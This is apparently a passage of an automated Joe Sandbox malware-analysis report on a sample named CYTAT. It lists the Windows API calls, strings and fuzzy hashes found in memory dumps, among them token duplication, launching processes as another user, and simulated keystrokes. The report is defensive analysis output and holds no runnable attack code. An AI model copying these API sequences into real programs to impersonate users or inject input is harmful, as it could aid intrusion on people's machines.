                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 00444B34
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc_memmove
                                                • String ID:
                                                • API String ID: 1183979061-0
                                                • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __lock_file
                                                • String ID:
                                                • API String ID: 3031932315-0
                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 03FC13F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 72ec11ea8cfb3522f989d526dd583816de7af80059b8a6b06eddffb9aca414f4
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: 4CE0E67498010EDFDB00EFB8D6496DE7FB4EF04302F1041A5FD01D2281D6309D608A62
                                                APIs
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                • SendMessageW.USER32 ref: 0047CA7F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                • ImageList_SetDragCursorImage.COMCTL32(00ACED10,00000000,00000000,00000000), ref: 0047CB9B
                                                • ImageList_BeginDrag.COMCTL32(00ACED10,00000000,000000F8,000000F0), ref: 0047CBAC
                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                • SendMessageW.USER32 ref: 0047CD12
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                • SendMessageW.USER32 ref: 0047CD80
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                • SendMessageW.USER32 ref: 0047CE93
                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,009E1B90,00000000,?,?,?,?), ref: 0047CF1C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                • SendMessageW.USER32 ref: 0047CF6B
                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,009E1B90,00000000,?,?,?,?), ref: 0047CFE6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3100379633-4164748364
                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00434420
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                • IsIconic.USER32(?), ref: 0043444F
                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 2889586943-2988720461
                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                APIs
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                • _wcslen.LIBCMT ref: 00446498
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                • String ID: $@OH$default$winsta0
                                                • API String ID: 3324942560-3791954436
                                                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                • __swprintf.LIBCMT ref: 004789D3
                                                • __swprintf.LIBCMT ref: 00478A1D
                                                • __swprintf.LIBCMT ref: 00478A4B
                                                • __swprintf.LIBCMT ref: 00478A79
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                • __swprintf.LIBCMT ref: 00478AA7
                                                • __swprintf.LIBCMT ref: 00478AD5
                                                • __swprintf.LIBCMT ref: 00478B03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 999945258-2428617273
                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                • __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscpy.LIBCMT ref: 004034A7
                                                • _wcscat.LIBCMT ref: 004034BC
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                • _wcscpy.LIBCMT ref: 004035A0
                                                • _wcslen.LIBCMT ref: 00403623
                                                • _wcslen.LIBCMT ref: 0040367D
                                                Strings
                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                • Unterminated string, xrefs: 00428348
                                                • Error opening the file, xrefs: 00428231
                                                • _, xrefs: 0040371C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                • API String ID: 3393021363-188983378
                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1409584000-438819550
                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                • __swprintf.LIBCMT ref: 00431C2E
                                                • _wcslen.LIBCMT ref: 00431C3A
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
